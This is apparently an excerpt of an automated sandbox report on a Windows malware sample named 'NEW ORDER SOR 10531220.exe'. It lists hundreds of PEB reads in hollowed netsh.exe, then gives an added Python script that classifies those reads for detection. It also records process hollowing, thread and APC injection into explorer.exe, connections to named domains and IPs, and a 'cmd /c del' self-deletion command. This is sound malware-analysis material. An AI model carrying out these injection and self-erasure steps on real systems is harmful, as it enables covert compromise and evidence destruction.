Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00E105AC mov eax, dword ptr fs:[00000030h] 15_2_00E105AC
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D7A185 mov eax, dword ptr fs:[00000030h] 15_2_00D7A185
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D6C182 mov eax, dword ptr fs:[00000030h] 15_2_00D6C182
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D72581 mov eax, dword ptr fs:[00000030h] 15_2_00D72581
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D72581 mov eax, dword ptr fs:[00000030h] 15_2_00D72581
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D72581 mov eax, dword ptr fs:[00000030h] 15_2_00D72581
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D72581 mov eax, dword ptr fs:[00000030h] 15_2_00D72581
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D42D8A mov eax, dword ptr fs:[00000030h] 15_2_00D42D8A
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D42D8A mov eax, dword ptr fs:[00000030h] 15_2_00D42D8A
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D42D8A mov eax, dword ptr fs:[00000030h] 15_2_00D42D8A
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D42D8A mov eax, dword ptr fs:[00000030h] 15_2_00D42D8A
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D42D8A mov eax, dword ptr fs:[00000030h] 15_2_00D42D8A
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D71DB5 mov eax, dword ptr fs:[00000030h] 15_2_00D71DB5
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D71DB5 mov eax, dword ptr fs:[00000030h] 15_2_00D71DB5
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D71DB5 mov eax, dword ptr fs:[00000030h] 15_2_00D71DB5
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00DC51BE mov eax, dword ptr fs:[00000030h] 15_2_00DC51BE
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00DC51BE mov eax, dword ptr fs:[00000030h] 15_2_00DC51BE
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00DC51BE mov eax, dword ptr fs:[00000030h] 15_2_00DC51BE
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00DC51BE mov eax, dword ptr fs:[00000030h] 15_2_00DC51BE
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D735A1 mov eax, dword ptr fs:[00000030h] 15_2_00D735A1
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D761A0 mov eax, dword ptr fs:[00000030h] 15_2_00D761A0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D761A0 mov eax, dword ptr fs:[00000030h] 15_2_00D761A0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00DC69A6 mov eax, dword ptr fs:[00000030h] 15_2_00DC69A6
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D67D50 mov eax, dword ptr fs:[00000030h] 15_2_00D67D50
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D6B944 mov eax, dword ptr fs:[00000030h] 15_2_00D6B944
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D6B944 mov eax, dword ptr fs:[00000030h] 15_2_00D6B944
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D83D43 mov eax, dword ptr fs:[00000030h] 15_2_00D83D43
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00DC3540 mov eax, dword ptr fs:[00000030h] 15_2_00DC3540
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D6C577 mov eax, dword ptr fs:[00000030h] 15_2_00D6C577
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D6C577 mov eax, dword ptr fs:[00000030h] 15_2_00D6C577
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D4B171 mov eax, dword ptr fs:[00000030h] 15_2_00D4B171
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D4B171 mov eax, dword ptr fs:[00000030h] 15_2_00D4B171
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D4C962 mov eax, dword ptr fs:[00000030h] 15_2_00D4C962
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D49100 mov eax, dword ptr fs:[00000030h] 15_2_00D49100
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D49100 mov eax, dword ptr fs:[00000030h] 15_2_00D49100
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D49100 mov eax, dword ptr fs:[00000030h] 15_2_00D49100
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00E18D34 mov eax, dword ptr fs:[00000030h] 15_2_00E18D34
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D53D34 mov eax, dword ptr fs:[00000030h] 15_2_00D53D34
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D53D34 mov eax, dword ptr fs:[00000030h] 15_2_00D53D34
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D53D34 mov eax, dword ptr fs:[00000030h] 15_2_00D53D34
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D53D34 mov eax, dword ptr fs:[00000030h] 15_2_00D53D34
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D53D34 mov eax, dword ptr fs:[00000030h] 15_2_00D53D34
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D53D34 mov eax, dword ptr fs:[00000030h] 15_2_00D53D34
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D53D34 mov eax, dword ptr fs:[00000030h] 15_2_00D53D34
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D53D34 mov eax, dword ptr fs:[00000030h] 15_2_00D53D34
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D53D34 mov eax, dword ptr fs:[00000030h] 15_2_00D53D34
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D53D34 mov eax, dword ptr fs:[00000030h] 15_2_00D53D34
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D53D34 mov eax, dword ptr fs:[00000030h] 15_2_00D53D34
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D53D34 mov eax, dword ptr fs:[00000030h] 15_2_00D53D34
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D53D34 mov eax, dword ptr fs:[00000030h] 15_2_00D53D34
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D4AD30 mov eax, dword ptr fs:[00000030h] 15_2_00D4AD30
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00DCA537 mov eax, dword ptr fs:[00000030h] 15_2_00DCA537
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D74D3B mov eax, dword ptr fs:[00000030h] 15_2_00D74D3B
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D74D3B mov eax, dword ptr fs:[00000030h] 15_2_00D74D3B
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D74D3B mov eax, dword ptr fs:[00000030h] 15_2_00D74D3B
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D7513A mov eax, dword ptr fs:[00000030h] 15_2_00D7513A
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D7513A mov eax, dword ptr fs:[00000030h] 15_2_00D7513A
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D64120 mov eax, dword ptr fs:[00000030h] 15_2_00D64120
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D64120 mov eax, dword ptr fs:[00000030h] 15_2_00D64120
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D64120 mov eax, dword ptr fs:[00000030h] 15_2_00D64120
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D64120 mov eax, dword ptr fs:[00000030h] 15_2_00D64120
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D64120 mov ecx, dword ptr fs:[00000030h] 15_2_00D64120
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D736CC mov eax, dword ptr fs:[00000030h] 15_2_00D736CC
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D72ACB mov eax, dword ptr fs:[00000030h] 15_2_00D72ACB
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00DFFEC0 mov eax, dword ptr fs:[00000030h] 15_2_00DFFEC0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D88EC7 mov eax, dword ptr fs:[00000030h] 15_2_00D88EC7
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D72AE4 mov eax, dword ptr fs:[00000030h] 15_2_00D72AE4
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D716E0 mov ecx, dword ptr fs:[00000030h] 15_2_00D716E0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00E18ED6 mov eax, dword ptr fs:[00000030h] 15_2_00E18ED6
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D576E2 mov eax, dword ptr fs:[00000030h] 15_2_00D576E2
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D7D294 mov eax, dword ptr fs:[00000030h] 15_2_00D7D294
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D7D294 mov eax, dword ptr fs:[00000030h] 15_2_00D7D294
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00E10EA5 mov eax, dword ptr fs:[00000030h] 15_2_00E10EA5
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00E10EA5 mov eax, dword ptr fs:[00000030h] 15_2_00E10EA5
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00E10EA5 mov eax, dword ptr fs:[00000030h] 15_2_00E10EA5
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00DDFE87 mov eax, dword ptr fs:[00000030h] 15_2_00DDFE87
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D5AAB0 mov eax, dword ptr fs:[00000030h] 15_2_00D5AAB0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D5AAB0 mov eax, dword ptr fs:[00000030h] 15_2_00D5AAB0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D7FAB0 mov eax, dword ptr fs:[00000030h] 15_2_00D7FAB0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D452A5 mov eax, dword ptr fs:[00000030h] 15_2_00D452A5
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D452A5 mov eax, dword ptr fs:[00000030h] 15_2_00D452A5
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D452A5 mov eax, dword ptr fs:[00000030h] 15_2_00D452A5
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D452A5 mov eax, dword ptr fs:[00000030h] 15_2_00D452A5
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D452A5 mov eax, dword ptr fs:[00000030h] 15_2_00D452A5
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00DC46A7 mov eax, dword ptr fs:[00000030h] 15_2_00DC46A7
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00E18A62 mov eax, dword ptr fs:[00000030h] 15_2_00E18A62
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00DD4257 mov eax, dword ptr fs:[00000030h] 15_2_00DD4257
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D49240 mov eax, dword ptr fs:[00000030h] 15_2_00D49240
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D49240 mov eax, dword ptr fs:[00000030h] 15_2_00D49240
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D49240 mov eax, dword ptr fs:[00000030h] 15_2_00D49240
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D49240 mov eax, dword ptr fs:[00000030h] 15_2_00D49240
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D57E41 mov eax, dword ptr fs:[00000030h] 15_2_00D57E41
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D57E41 mov eax, dword ptr fs:[00000030h] 15_2_00D57E41
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D57E41 mov eax, dword ptr fs:[00000030h] 15_2_00D57E41
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D57E41 mov eax, dword ptr fs:[00000030h] 15_2_00D57E41
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D57E41 mov eax, dword ptr fs:[00000030h] 15_2_00D57E41
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D57E41 mov eax, dword ptr fs:[00000030h] 15_2_00D57E41
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D8927A mov eax, dword ptr fs:[00000030h] 15_2_00D8927A
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D6AE73 mov eax, dword ptr fs:[00000030h] 15_2_00D6AE73
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D6AE73 mov eax, dword ptr fs:[00000030h] 15_2_00D6AE73
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D6AE73 mov eax, dword ptr fs:[00000030h] 15_2_00D6AE73
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D6AE73 mov eax, dword ptr fs:[00000030h] 15_2_00D6AE73
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D6AE73 mov eax, dword ptr fs:[00000030h] 15_2_00D6AE73
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00E0EA55 mov eax, dword ptr fs:[00000030h] 15_2_00E0EA55
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D5766D mov eax, dword ptr fs:[00000030h] 15_2_00D5766D
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00DFB260 mov eax, dword ptr fs:[00000030h] 15_2_00DFB260
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00DFB260 mov eax, dword ptr fs:[00000030h] 15_2_00DFB260
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D4AA16 mov eax, dword ptr fs:[00000030h] 15_2_00D4AA16
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D4AA16 mov eax, dword ptr fs:[00000030h] 15_2_00D4AA16
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D45210 mov eax, dword ptr fs:[00000030h] 15_2_00D45210
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D45210 mov ecx, dword ptr fs:[00000030h] 15_2_00D45210
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D45210 mov eax, dword ptr fs:[00000030h] 15_2_00D45210
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D45210 mov eax, dword ptr fs:[00000030h] 15_2_00D45210
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D63A1C mov eax, dword ptr fs:[00000030h] 15_2_00D63A1C
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D7A61C mov eax, dword ptr fs:[00000030h] 15_2_00D7A61C
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D7A61C mov eax, dword ptr fs:[00000030h] 15_2_00D7A61C
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D4C600 mov eax, dword ptr fs:[00000030h] 15_2_00D4C600
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D4C600 mov eax, dword ptr fs:[00000030h] 15_2_00D4C600
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D4C600 mov eax, dword ptr fs:[00000030h] 15_2_00D4C600
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D78E00 mov eax, dword ptr fs:[00000030h] 15_2_00D78E00
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D58A0A mov eax, dword ptr fs:[00000030h] 15_2_00D58A0A
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00DFFE3F mov eax, dword ptr fs:[00000030h] 15_2_00DFFE3F
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00E01608 mov eax, dword ptr fs:[00000030h] 15_2_00E01608
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D4E620 mov eax, dword ptr fs:[00000030h] 15_2_00D4E620
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D84A2C mov eax, dword ptr fs:[00000030h] 15_2_00D84A2C
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D84A2C mov eax, dword ptr fs:[00000030h] 15_2_00D84A2C
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00DC53CA mov eax, dword ptr fs:[00000030h] 15_2_00DC53CA
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00DC53CA mov eax, dword ptr fs:[00000030h] 15_2_00DC53CA
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D837F5 mov eax, dword ptr fs:[00000030h] 15_2_00D837F5
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D703E2 mov eax, dword ptr fs:[00000030h] 15_2_00D703E2
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D703E2 mov eax, dword ptr fs:[00000030h] 15_2_00D703E2
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D703E2 mov eax, dword ptr fs:[00000030h] 15_2_00D703E2
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D703E2 mov eax, dword ptr fs:[00000030h] 15_2_00D703E2
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D703E2 mov eax, dword ptr fs:[00000030h] 15_2_00D703E2
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D703E2 mov eax, dword ptr fs:[00000030h] 15_2_00D703E2
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D6DBE9 mov eax, dword ptr fs:[00000030h] 15_2_00D6DBE9
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D72397 mov eax, dword ptr fs:[00000030h] 15_2_00D72397
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D58794 mov eax, dword ptr fs:[00000030h] 15_2_00D58794
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00E15BA5 mov eax, dword ptr fs:[00000030h] 15_2_00E15BA5
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D7B390 mov eax, dword ptr fs:[00000030h] 15_2_00D7B390
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00DC7794 mov eax, dword ptr fs:[00000030h] 15_2_00DC7794
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00DC7794 mov eax, dword ptr fs:[00000030h] 15_2_00DC7794
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00DC7794 mov eax, dword ptr fs:[00000030h] 15_2_00DC7794
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D51B8F mov eax, dword ptr fs:[00000030h] 15_2_00D51B8F
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D51B8F mov eax, dword ptr fs:[00000030h] 15_2_00D51B8F
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00DFD380 mov ecx, dword ptr fs:[00000030h] 15_2_00DFD380
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00E0138A mov eax, dword ptr fs:[00000030h] 15_2_00E0138A
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D74BAD mov eax, dword ptr fs:[00000030h] 15_2_00D74BAD
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D74BAD mov eax, dword ptr fs:[00000030h] 15_2_00D74BAD
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D74BAD mov eax, dword ptr fs:[00000030h] 15_2_00D74BAD
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00E18F6A mov eax, dword ptr fs:[00000030h] 15_2_00E18F6A
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D4F358 mov eax, dword ptr fs:[00000030h] 15_2_00D4F358
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D4DB40 mov eax, dword ptr fs:[00000030h] 15_2_00D4DB40
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D5EF40 mov eax, dword ptr fs:[00000030h] 15_2_00D5EF40
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D73B7A mov eax, dword ptr fs:[00000030h] 15_2_00D73B7A
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D73B7A mov eax, dword ptr fs:[00000030h] 15_2_00D73B7A
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D4DB60 mov ecx, dword ptr fs:[00000030h] 15_2_00D4DB60
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D5FF60 mov eax, dword ptr fs:[00000030h] 15_2_00D5FF60
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00E18B58 mov eax, dword ptr fs:[00000030h] 15_2_00E18B58
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D6F716 mov eax, dword ptr fs:[00000030h] 15_2_00D6F716
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00DDFF10 mov eax, dword ptr fs:[00000030h] 15_2_00DDFF10
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00DDFF10 mov eax, dword ptr fs:[00000030h] 15_2_00DDFF10
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D7A70E mov eax, dword ptr fs:[00000030h] 15_2_00D7A70E
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D7A70E mov eax, dword ptr fs:[00000030h] 15_2_00D7A70E
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D7E730 mov eax, dword ptr fs:[00000030h] 15_2_00D7E730
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00E1070D mov eax, dword ptr fs:[00000030h] 15_2_00E1070D
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00E1070D mov eax, dword ptr fs:[00000030h] 15_2_00E1070D
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D44F2E mov eax, dword ptr fs:[00000030h] 15_2_00D44F2E
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D44F2E mov eax, dword ptr fs:[00000030h] 15_2_00D44F2E
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00E0131B mov eax, dword ptr fs:[00000030h] 15_2_00E0131B
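The list above records every `mov eax, dword ptr fs:[00000030h]` (and a few `mov ecx, ...`) inside the code that ended up in netsh.exe. On a 32-bit (WOW64) thread FS points at the TEB and TEB+0x30 holds the PEB pointer, so the instruction by itself only says "this code reads the PEB". Whether a given hit is an anti-debug check (PEB.BeingDebugged at +0x02, PEB.NtGlobalFlag at +0x68) or ordinary position-independent API resolution (walking PEB.Ldr at +0x0C to find kernel32 without an import table, typical of shellcode-style payloads) depends on the instruction that consumes the loaded pointer, which the sandbox does not show. The following Python is an added example and not part of the Joe Sandbox report: it finds the byte encodings of the load in a 32-bit code blob and labels each hit by the PEB field the next instruction dereferences. The code bytes are constructed for the example, not taken from the sample.

```python
"""Classify fs:[30h] (PEB) reads in a 32-bit code blob by the field consumed next.

Added example for the sandbox signature above; the input bytes are constructed.
"""
import re
from collections import Counter

# Encodings of `mov r32, dword ptr fs:[30h]` in 32-bit code:
#   64 A1 30 00 00 00           mov eax, fs:[30h]   (moffs32 short form, eax only)
#   64 8B <modrm> 30 00 00 00   mov r32, fs:[30h]   (modrm: mod=00, rm=101 -> disp32; reg field = r32)
_REG = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]
PEB_LOAD = re.compile(
    rb"\x64(?:\xA1|\x8B[\x05\x0D\x15\x1D\x25\x2D\x35\x3D])\x30\x00\x00\x00"
)

# 32-bit PEB fields that the instruction after the load usually dereferences.
PEB_FIELDS = {0x02: "BeingDebugged", 0x0C: "Ldr", 0x18: "ProcessHeap", 0x68: "NtGlobalFlag"}

# Opcodes whose ModRM can address [reg + disp8]:
#   8B /r  mov r32, r/m32      0F B6 /r  movzx r32, r/m8      80 /7 ib  cmp r/m8, imm8
_FOLLOW_OPS = (b"\x8B", b"\x0F\xB6", b"\x80")


def _loaded_reg(match) -> int:
    """Register number (0..7) written by the matched PEB load."""
    raw = match.group(0)
    return 0 if raw[1] == 0xA1 else (raw[2] >> 3) & 7


def _next_field(code: bytes, pos: int, reg: int):
    """Name the PEB field read by the instruction right after the load, if recognisable."""
    if reg == 4:  # rm=100 means a SIB byte follows; not handled here
        return None
    for op in _FOLLOW_OPS:
        end = pos + len(op)
        if code[pos:end] == op and end + 1 < len(code):
            modrm, disp8 = code[end], code[end + 1]
            # mod=01 -> [rm + disp8]; rm must be the register that holds the PEB pointer
            if modrm >> 6 == 1 and modrm & 7 == reg:
                return PEB_FIELDS.get(disp8, f"+0x{disp8:02x}")
    return None


def classify_peb_accesses(code: bytes):
    """Return (offset, register, field) for each fs:[30h] load found in `code`."""
    hits = []
    for m in PEB_LOAD.finditer(code):
        reg = _loaded_reg(m)
        hits.append((m.start(), _REG[reg], _next_field(code, m.end(), reg)))
    return hits


def summarize(code: bytes) -> Counter:
    """Count hits per PEB field; loads whose consumer is not recognised are 'unclassified'."""
    return Counter(field or "unclassified" for _, _, field in classify_peb_accesses(code))


# Constructed 32-bit code fragment (not from the sample): four PEB loads plus a TEB decoy.
SAMPLE_CODE = (
    b"\x55\x8B\xEC"                          # push ebp; mov ebp, esp
    + b"\x64\xA1\x30\x00\x00\x00"            # mov eax, fs:[30h]
    + b"\x0F\xB6\x40\x02"                    # movzx eax, byte ptr [eax+2]    -> BeingDebugged
    + b"\x64\x8B\x0D\x30\x00\x00\x00"        # mov ecx, fs:[30h]
    + b"\x8B\x49\x0C"                        # mov ecx, [ecx+0Ch]             -> Ldr (module list walk)
    + b"\x64\xA1\x18\x00\x00\x00"            # mov eax, fs:[18h]  (TEB self pointer, not the PEB)
    + b"\x64\xA1\x30\x00\x00\x00"            # mov eax, fs:[30h]
    + b"\x8B\x40\x68"                        # mov eax, [eax+68h]             -> NtGlobalFlag
    + b"\x64\x8B\x15\x30\x00\x00\x00"        # mov edx, fs:[30h]
    + b"\x5D\xC3"                            # pop ebp; ret                   -> no recognisable consumer
)

if __name__ == "__main__":
    for offset, reg, field in classify_peb_accesses(SAMPLE_CODE):
        print(f"{offset:#06x}: mov {reg}, fs:[30h] -> {field or 'unclassified'}")
    print(dict(summarize(SAMPLE_CODE)))
```

Run against a dumped region (for example the `0000000F.00000002.*.sdmp` memory dumps referenced elsewhere in this report) the summary tells you whether the hundred-odd PEB reads are mostly Ldr walks (API resolution, expected in any unpacked payload) or BeingDebugged/NtGlobalFlag reads (the actual anti-debug logic). The classifier only looks at the very next instruction, so a load whose pointer is parked in a register and used later is reported as unclassified rather than guessed.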
Enables debug privileges
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe Process token adjusted: Debug (2 occurrences)
Source: C:\Windows\SysWOW64\netsh.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.chjcsc.com
Source: C:\Windows\explorer.exe Network Connect: 172.255.115.89 80
Source: C:\Windows\explorer.exe Domain query: www.socialdating24.com
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80
Source: C:\Windows\explorer.exe Domain query: www.theglasshousenyc.com
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write (2 occurrences)
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe Section loaded: unknown target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and write (2 occurrences)
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe Thread register set: target process: 3472 (2 occurrences)
Source: C:\Windows\SysWOW64\netsh.exe Thread register set: target process: 3472
Queues an APC in another process (thread injection)
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe Thread APC queued: target process: C:\Windows\explorer.exe
Sample uses process hollowing technique
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe Section unmapped: C:\Windows\SysWOW64\netsh.exe base address: 1280000
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe Process created: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe (2 occurrences)
Source: C:\Windows\SysWOW64\netsh.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe'
